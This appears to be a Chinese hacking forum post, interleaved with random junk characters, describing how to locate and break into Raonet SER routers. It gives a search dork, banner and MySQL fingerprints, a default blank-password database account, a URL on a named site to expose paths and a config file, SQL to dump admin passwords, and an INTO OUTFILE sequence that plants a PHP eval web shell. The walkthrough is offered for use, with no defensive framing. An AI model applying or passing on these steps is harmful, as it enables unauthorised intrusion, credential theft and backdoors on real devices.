寻找存在漏洞的路由器方法:
* R6 N3 |. u0 I. h. E: f% y8 g
+ h3 s# d9 Z, J; S8 p1:google搜索'Raonet Subscriber Ethernet Router'+ Q* j: _7 D7 p+ u. P- O5 Y+ ]2 ?, H
5 H' J$ ~& _% O- h* c# C" {2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001+ M& G: {* c/ y0 I% g; i2 ?# B; p
: D' _. F" c# F) a3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。- k( F7 H/ |3 }4 B$ P) R
1 I5 L q" F9 W//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
: k6 k' {) R2 u% R
9 w* L* B6 d5 [# Z+ m# Z# e7 M - S7 b) k* K0 \
5 B, Q$ ?" B7 s/ y$ ]4 I4 S入侵步骤:2 ~9 s1 n' s r( T
$ t& x2 N% l5 V& T- y6 o6 j0 u
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, w" J, t1 i$ U
) J: v, P4 J9 r) a2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc2 M0 u- b! P% H+ G
3:得到密码后连接,查看GUI管理密码:
( A% _4 n9 |) c& c6 quse ser_5009 a% l6 s3 w. a
select id,passwd from user;7 d6 v* |) N r% {0 t$ L
4:通过数据库写入webshell,执行命令:
2 ?0 f! n5 r# T- c+ u; h) Fuse mysql;$ m% }( w. ^3 x
create table ok(cmd TEXT);# K0 A* E. h; b' A; y+ \1 B2 ^
insert into ok values("<?php @eval($_POST[cmd])?>");
g Z# L- j5 @8 w' }# \select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";$ X9 C& H# w+ \
drop table ok;
3 _; c# @* K* b: Q' _( X. i) N3 F+ J! z h' f
5:连接后门shell.php
V* n3 h" z6 i D) R% Z( M% V
3 c# ^+ @" G2 u' u0 ^3 f6. 搞定!
& g3 t( W* ~" `7 b
$ a3 M1 I9 v' A9 _ |